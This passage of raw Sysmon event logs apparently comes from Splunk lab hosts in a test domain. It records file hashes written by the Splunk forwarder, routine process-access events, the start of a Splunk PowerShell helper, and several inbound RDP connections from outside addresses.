Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59D31D85A5567CC6AE6C59155AA540A2,SHA256=0DB4284DDF93FF825DEF0C8338E082CEA034D67C3BA332FE6A7B1FDBC51B615A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977198Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:23.786{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5464987DAA2E16B69D5675D63C722A6E,SHA256=B343145819FC94F2804896B2C474DD114C19C00EBFA466CBECA7F3AC1CABE932,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:23.609{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F3F83FF475E7FACF7F5BF8D0DA2503,SHA256=D3CA90CD3E643880F1A244C3E1BE44730D6B458341D44B7E589A482FE9519B93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:23.328{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF7348377ACFB3DC916B2FEA3212DC99,SHA256=E46C3379D9CC56B225DD0923126A498797925745CCA09E6D2AA7E662B4D7D1BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:24.960{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF5010C530A8369C807D49C3A448129C,SHA256=01C835928FD2E85CE60CCA594FDFDFEF0D88F45E3E07F5A934A877031EF6AE5B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:23.054{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50434-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:24.691{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=586FB23872AC326B67C3583D844DD997,SHA256=FB8BE799E86DA55EF2A246112919B3A41D3B1FE3C19E0BBBE38BEFA32BC3787F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977200Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:24.801{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFDE1AC460B3C5D7A782FAF5190B62A9,SHA256=71B681B2BD50028396BF0FF6299620B72795836BF177926EC3159EF7CB0AB8FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977199Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:24.364{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C02116D694F10EBF00CD4EFB1F0DB06,SHA256=1E570C6CB55A552AC935E9D32772D26F27DDBA539C591296435649A47BE7B388,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977217Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.926{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8919-6151-8F79-00000000FD01}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977216Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.926{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977215Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.926{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977214Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.926{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977213Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.926{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977212Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.926{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977211Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.926{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977210Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.926{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977209Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.926{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977208Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.926{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977207Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.911{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8919-6151-8F79-00000000FD01}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977206Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.911{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8919-6151-8F79-00000000FD01}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977205Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.912{69CF5F33-8919-6151-8F79-00000000FD01}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977204Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.817{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAF1EE7CA9E815C7E5A5447D146C0404,SHA256=BC5F23A26A5FEAF7D3DCB4981ECBA9936B274D34346807884ABC4130FC8CD987,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:25.692{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=666E4F634DFBA09299401E037B306282,SHA256=D479724C83C6F9C521B5E671F50AA10EFBE960731EE267F43671D53950B43BA6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977203Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:21.951{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50380-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977202Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:21.567{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-57003-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977201Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:21.551{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-20748-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977235Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.880{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C5FAB1F65133BA9BE89CB5C1430B1D,SHA256=BCDCE9C5C5A14AD6721ECCD57C545C229435C7E11AA6B7BFA82F6C8395BBDB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977234Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.833{69CF5F33-891A-6151-9079-00000000FD01}3244856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:26.729{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEF16D28C0D98A4B29D8C6E1B961566E,SHA256=B6C4CE0635914A2D5C3D665830D02955EDDE067C9F12FD17B8895306A34231C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977233Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-891A-6151-9079-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977232Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977231Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977230Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977229Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977228Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 